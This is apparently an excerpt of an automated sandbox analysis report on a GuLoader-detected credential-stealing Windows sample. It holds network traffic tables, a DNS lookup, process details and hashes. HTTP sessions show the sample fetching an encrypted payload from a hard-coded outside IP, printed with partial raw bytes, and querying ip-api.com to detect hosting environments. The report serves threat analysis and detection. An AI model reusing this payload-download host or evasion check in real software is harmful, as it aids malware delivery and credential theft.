May 27, 2024 09:15:11.962677956 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962763071 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962805033 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962827921 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962857008 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962946892 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.962963104 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.962995052 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.963066101 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.963114023 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.963227034 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.963239908 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.963283062 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.963387012 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.964725018 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.964958906 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.964983940 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965135098 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.965168953 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965302944 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965410948 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.965437889 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965538025 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.965574026 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965579987 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.965593100 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965689898 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.965689898 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.965707064 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965720892 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965828896 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965857029 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.965909958 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965962887 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.965974092 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966000080 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966038942 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966059923 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966181993 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966214895 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966239929 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966259956 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966288090 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966334105 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966339111 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966382027 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966432095 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966448069 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966460943 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966556072 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966572046 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966572046 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966620922 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966689110 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:11.966718912 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:11.966867924 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.170274019 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.170372009 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.170461893 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.170514107 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.170546055 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.170584917 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.170694113 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.170734882 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.170794964 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.170872927 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.170886040 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.170922995 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.170970917 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.170988083 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.171026945 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.171036959 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.171144009 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.171155930 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.171170950 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.171221972 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.171221972 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.171313047 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.171313047 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.171416044 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.171813011 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.171933889 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.171962976 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.171991110 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172066927 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172096014 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172116041 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172221899 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172235012 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172287941 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172311068 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172353983 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172353983 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172367096 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172456980 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172480106 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172492027 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172503948 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172508955 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172559977 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172638893 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172698021 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172709942 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172718048 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172801018 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.172816992 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172863960 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172976971 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.172990084 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173089981 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173103094 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173132896 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173182964 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173211098 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173211098 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173338890 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173353910 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173463106 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173475027 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173485041 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173489094 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173507929 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173563957 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173588037 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173640013 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173640013 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173696995 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173710108 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173737049 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173820972 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.173821926 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173872948 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.173964024 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174073935 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174088001 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174182892 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174236059 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174251080 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174340963 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174381971 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174390078 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174401045 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174447060 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174485922 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174496889 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174575090 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174575090 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174606085 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174619913 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174623966 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174724102 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174731970 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174731970 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174741030 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174861908 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174875975 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174932957 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174935102 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174988031 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.174992085 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.174992085 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175088882 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175106049 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175120115 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175137997 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175220966 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175235033 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175302982 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175308943 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175354958 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175354958 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175467968 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175576925 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175590992 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175683975 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175693035 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175740957 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175796986 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:15:12.175822973 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:12.175995111 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:15:15.688504934 CEST	50032	80	192.168.11.30	208.95.112.1
May 27, 2024 09:15:15.787225962 CEST	80	50032	208.95.112.1	192.168.11.30
May 27, 2024 09:15:15.787427902 CEST	50032	80	192.168.11.30	208.95.112.1
May 27, 2024 09:15:15.790935040 CEST	50032	80	192.168.11.30	208.95.112.1
May 27, 2024 09:15:15.891424894 CEST	80	50032	208.95.112.1	192.168.11.30
May 27, 2024 09:15:15.933357954 CEST	50032	80	192.168.11.30	208.95.112.1
May 27, 2024 09:16:26.807048082 CEST	80	50032	208.95.112.1	192.168.11.30
May 27, 2024 09:16:26.807188034 CEST	50032	80	192.168.11.30	208.95.112.1
May 27, 2024 09:16:47.477433920 CEST	80	50032	208.95.112.1	192.168.11.30
May 27, 2024 09:17:00.675314903 CEST	50031	80	192.168.11.30	109.248.151.11
May 27, 2024 09:17:00.886801958 CEST	80	50031	109.248.151.11	192.168.11.30
May 27, 2024 09:17:00.887015104 CEST	50031	80	192.168.11.30	109.248.151.11

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 27, 2024 09:15:15.552639008 CEST	61029	53	192.168.11.30	1.1.1.1
May 27, 2024 09:15:15.653435946 CEST	53	61029	1.1.1.1	192.168.11.30

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 27, 2024 09:15:15.552639008 CEST	192.168.11.30	1.1.1.1	0xe9e8	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 27, 2024 09:15:15.653435946 CEST	1.1.1.1	192.168.11.30	0xe9e8	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

109.248.151.11

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.30	50031	109.248.151.11	80	7240	C:\Users\user\Desktop\99200032052824.bat.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 09:15:10.898099899 CEST	178	OUT	GET /LZJRCXHEEshk185.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: 109.248.151.11 Cache-Control: no-cache
May 27, 2024 09:15:11.112833977 CEST	1289	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 27 May 2024 03:18:36 GMT Accept-Ranges: bytes ETag: "d437ea8fe4afda1:0" Server: Microsoft-IIS/8.5 Date: Mon, 27 May 2024 07:15:11 GMT Content-Length: 242240 Data Raw: 06 fe 8f ed 60 52 83 83 33 1a 58 91 7c 2f 47 33 1b a2 50 60 c3 2d 0b ab a6 89 8d 9a ca dd e1 f8 2f 8e 44 27 d9 77 21 94 6c a8 9d 89 3a 3f 5e 1c 1f 5c 30 fc 6b 89 32 f5 d8 59 52 c5 65 ab 07 18 49 5f 9f 0a ba ac 5a 76 c1 e4 f1 aa 60 5b 3c 37 e7 63 d7 b8 0f d5 f7 62 27 5a 17 1d 86 cb f8 b9 40 7a 32 a3 40 4e 38 20 a8 ce d5 22 20 0c c0 b1 34 c3 27 5d 6f 55 6e 40 9b b1 56 b6 09 8d 60 a6 58 72 72 a2 81 37 b8 87 15 ae 69 cd a7 e5 2a 73 00 8a 6f 82 ae 9c 92 d1 c3 42 d3 e1 68 07 cb 57 c6 03 48 5c c2 12 dd 10 f1 f1 9d ba 8b 35 c0 86 e8 5f 61 13 45 ca 91 02 59 68 72 56 dd 61 fb 71 ab ee f8 43 86 3b 83 ca 07 61 cf da 4d 97 44 a6 de 1c 6a f5 b3 5c ea 78 8a 89 f9 31 90 33 b8 21 5e 03 61 12 29 41 8c e2 a6 62 bb cd 2b 07 dd 1f 9e f5 3f e0 5b 47 3f 51 a5 ae cd 9c 61 fb 6c 9f f2 cd 28 8b 01 b9 28 a1 ec c4 d1 e4 1f 7b 00 85 e9 3f c2 39 58 7e 5b ff 9d 3e b2 ba 6a e5 17 24 a0 5b b6 1f a6 d7 f9 b1 76 d3 38 47 37 ca d9 9c 86 ac 83 cb 30 ad bb aa da 7b a6 0d 37 9d cc 21 5a b1 f0 25 6f 5e db 4c 60 dd 61 bb 11 50 43 57 30 71 [TRUNCATED] Data Ascii: `R3X\|/G3P`-/D'w!l:?^\0k2YReI_Zv`[<7cb'Z@z2@N8 " 4']oUn@V`Xrr7isoBhWH\5_aEYhrVaqC;aMDj\x13!^a)Ab+?[G?Qal(({?9X~[>j$[v8G70{7!Z%o^L`aPCW0ql5+!^{efGr6uHm"0;d3gIiZEtNK4_36<'X5C H3X@;:]`'U%XRa`KKXx{b:ee..Y rsl&DMjIbaLla,"M[8i0?0!T5qhG-xW';Wff/$FBW\8N"^ZQ=B`"S@w8>Xlu@R(wPFCP84H:Y>!Lt!F.Xxj<iXC~tNJrGc:EWL0<ZSqtKPzdVl`@FbHCl_%mbJldrQr`F<CE4oLAJCTv"v_IK;\| c5J!ZKCmh:R#b~O [TRUNCATED]
May 27, 2024 09:15:11.112972021 CEST	1289	IN	Data Raw: a5 ed 1d 08 7c 12 6a be 4d f7 00 e5 05 28 5d cf 4a f9 54 78 d3 9d 1d 22 e6 a4 ad ca 53 1a 67 57 08 a7 88 a2 41 06 3d e6 e5 da ef 68 43 e9 b7 f9 da 84 63 e8 73 a8 2c b2 b1 0c e8 f2 af aa 1e c1 ea b0 eb 4d ab 3a 0f 69 25 3c 44 19 49 15 bf a2 a8 28 Data Ascii: \|jM(]JTx"SgWA=hCcs,M:i%<DI(S}\|j{*6Z?~(=/ER6N?1YZ-96t{4Ab5'e8.prky4me\|ufV&-5\`@CA@'$"N}]c7!-da)
May 27, 2024 09:15:11.112987041 CEST	1289	IN	Data Raw: cc 06 62 da 1d a9 48 2d 70 16 57 6c 63 ca cf ff d1 13 d0 fe a7 6a 7c 64 a7 19 3a 9b b6 34 93 2b 24 2d 47 cb 18 e4 09 f2 87 25 62 d1 62 dd 35 48 36 d1 30 34 84 57 5e c7 8b 0a 7e 2f e5 bd 6a 3f 3a db 89 0f 40 c9 f3 34 fd fc 4b bd 25 ad f9 54 9f a1 Data Ascii: bH-pWlcj\|d:4+$-G%bb5H604W^~/j?:@4K%T"gz81eM11:Z6m"q\|Xo`k\|2*&c?%6Bh+D}R>.$T!2t6m"@~X2f}4X(9'4iz2
May 27, 2024 09:15:11.113080025 CEST	1289	IN	Data Raw: 55 6d 25 1e 34 54 a2 18 e8 ce f6 62 4e fa 72 66 ef 07 00 89 bb 16 38 bc 71 d5 b7 72 81 86 d4 0e 89 b0 87 92 46 bb 14 e1 48 53 fa d0 c4 b1 05 7a da 6d 37 fe 95 20 a5 2f ba c2 2d 44 ac 58 8e a2 ce fd dd bd fd 88 a8 72 c5 1f a4 9f cd d5 6e 3d 74 36 Data Ascii: Um%4TbNrf8qrFHSzm7 /-DXrn=t6T/eKT(Uk4y_Eg?>-B&aHA66Uvx@;1'^Z+&>~i@Ms8K>3QkF-?\rk`+&
May 27, 2024 09:15:11.324342012 CEST	1289	IN	Data Raw: 4e cd 52 e5 77 38 21 28 4c a4 2a ce e8 fc 92 16 69 30 5b 2d 45 cd ec fc 41 10 ad 57 6c 3c b9 60 04 01 65 c6 e2 6b 63 cb 31 3a 11 9b 1f 21 1c b0 0a 89 68 aa 25 8b d6 b2 42 14 66 6a f0 af 46 6d 46 e3 c4 06 0b 10 a9 89 c0 4a 1f ac 63 1c 15 58 43 23 Data Ascii: NRw8!(Li0[-EAWl<`ekc1:!h%BfjFmFJcXC#1Nlv+_ln/r\|@F>KPGfOPOM KMXdv7b<nr]@/2fKP>@hI3.TibL40P'E2N^Pb
May 27, 2024 09:15:11.324438095 CEST	1289	IN	Data Raw: be c5 6f 2c 77 a4 55 ef ce 3e 17 1d 25 3b 15 9c ef 7b 04 84 88 5d d5 de 4b 25 a8 57 bf 31 c7 2f 58 c0 c6 35 ac c7 c4 78 55 20 58 3f f1 35 de 65 f6 ce 88 f7 63 95 75 04 4a 0c 64 6f 5f 9f 81 b5 fd f3 bf 36 c9 aa c7 47 6a 23 1c 92 fd e0 f6 9e c1 a4 Data Ascii: o,wU>%;{]K%W1/X5xU X?5ecuJdo_6Gj#fKNXG4)Ui@-G]d8`hK51NvBjDmLgHj7hG1m%4w)Jze/rRr`FIP'P:cO0>/WX
May 27, 2024 09:15:11.324537039 CEST	1289	IN	Data Raw: 93 bd 3d e7 ec 89 ce e4 bd 97 27 7b ef 85 fd ae e4 05 fb bd aa 8c bc 80 cf a3 35 8f 14 82 68 e0 42 8c c1 2d 50 e9 ae 0d 5d 4e c9 2f a8 e2 80 2c 0b a6 94 c7 46 37 54 66 46 23 24 cc ea c8 bb 34 f7 54 a0 14 58 0a 45 d0 cc 03 04 2d 39 a9 cd b4 ad ac Data Ascii: ='{5hB-P]N/,F7TfF#$4TXE-9I/-y;c{U>e:\&wz]I[W,&(bB45X?#icktOCdm6RjSL`2{GMR9>u07h0[<WL0Gndhc?wSvBT)IjD
May 27, 2024 09:15:11.324620008 CEST	1289	IN	Data Raw: 8f 06 db f5 78 08 62 ab b2 82 32 d3 25 4b 0b 89 fc 60 d4 d0 22 e3 59 e3 20 e4 cf ce 5e a8 fc cf 72 73 2e 6f b5 27 00 07 44 19 e0 bb 4d 19 47 15 6a 43 c1 0b 0b 62 fb 4f 17 a2 f8 1d 61 a2 8d 49 6c c4 87 86 7e e2 58 69 06 8f db 05 12 04 86 cd c6 cd Data Ascii: xb2%K`"Y ^rs.o'DMGjCbOaIl~Xi[cx4'cwT1Kh-\|WRhUf-2TD{e/9F/-s9cXUL0%KMw\9W&X6Hzo4XO iNc#Y7a
May 27, 2024 09:15:11.324654102 CEST	1289	IN	Data Raw: 74 e7 81 75 a3 4e 4b 1c 12 f3 0f f1 a1 b6 0c 33 c4 c8 98 30 b3 c0 12 bc e2 42 de 40 d9 ea e6 23 e5 dd e1 1c 68 91 0d 58 2e 89 ad 50 39 b0 0c 95 62 83 62 a6 d1 d5 f7 6e dc aa 07 70 82 25 e1 07 7f a0 2a 31 9f fc c1 c2 a8 68 13 4b 3d 08 ce dd 13 4b Data Ascii: tuNK30B@#hX.P9bbnp%*1hK=K\x0;b:E".F 1r"k@DE9jCnALl:Y:[K1zgj0@ T{th>F-xPTf,;Wf!(
May 27, 2024 09:15:11.324786901 CEST	1289	IN	Data Raw: 42 60 3d 62 45 5b 55 43 77 31 71 6c 11 ed df 8c 26 2b 84 e6 09 a3 8c 95 bd 3a 44 7f 65 10 46 45 ba 10 15 8c 97 8d 89 b5 75 3a 75 48 e7 96 ce 8b 19 93 ce d5 3b 1b d8 c1 f4 ba 30 d9 bf dc 1d c4 0a e1 93 65 33 82 a9 4d c4 df e4 da 49 d4 67 df 15 ca Data Ascii: B`=bE[UCw1ql&+:DeFEu:uH;0e3MIgm&zC*tNK<YE36=E A6##hX.8:]`&'uq-1a3eK=Kd5X{R9:%B@..",o'D_JCaK
May 27, 2024 09:15:11.324800968 CEST	1289	IN	Data Raw: 23 dd 1f 60 19 38 e0 7b 4a 7f 51 a5 70 cc a5 64 f9 6c 9f ce c8 28 8b 01 81 d5 5c 17 3b 2f e8 1e 7b 20 84 e9 1f c6 61 a6 72 5a ff 63 32 b3 ba 96 e9 57 a1 2e 32 99 05 58 38 06 91 76 d3 28 47 1d c1 e9 9e 86 df 81 cb 20 a0 bb aa cb 5b a6 0d 37 9d 32 Data Ascii: #`8{JQpdl(\;/{ arZc2W.2X8v(G [72/w~"^L1ewTCW0m(5Y!TkfgrgyOm1o<;Mj2WkI*c!@ZE&qNA>SA2L-Az#n3(@3+:{\|W%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.30	50032	208.95.112.1	80	7240	C:\Users\user\Desktop\99200032052824.bat.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 09:15:15.790935040 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
May 27, 2024 09:15:15.891424894 CEST	175	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 07:15:15 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Target ID:	5
Start time:	03:14:46
Start date:	27/05/2024
Path:	C:\Users\user\Desktop\99200032052824.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\99200032052824.bat.exe"
Imagebase:	0x400000
File size:	543'903 bytes
MD5 hash:	085DE7AC75BBD791C1B1F979FE8FF78C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1296162651331.0000000005B73000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:15:00
Start date:	27/05/2024
Path:	C:\Users\user\Desktop\99200032052824.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\99200032052824.bat.exe"
Imagebase:	0x400000
File size:	543'903 bytes
MD5 hash:	085DE7AC75BBD791C1B1F979FE8FF78C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1301032668397.0000000037647000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21.9%
Dynamic/Decrypted Code Coverage:	15.9%
Signature Coverage:	19.9%
Total number of Nodes:	1522
Total number of Limit Nodes:	42

Executed Functions

Function 0040320C Relevance: 89.6, APIs: 32, Strings: 19, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403231
GetVersion.KERNEL32 ref: 00403237
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040326A
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032A6
OleInitialize.OLE32(00000000), ref: 004032AD
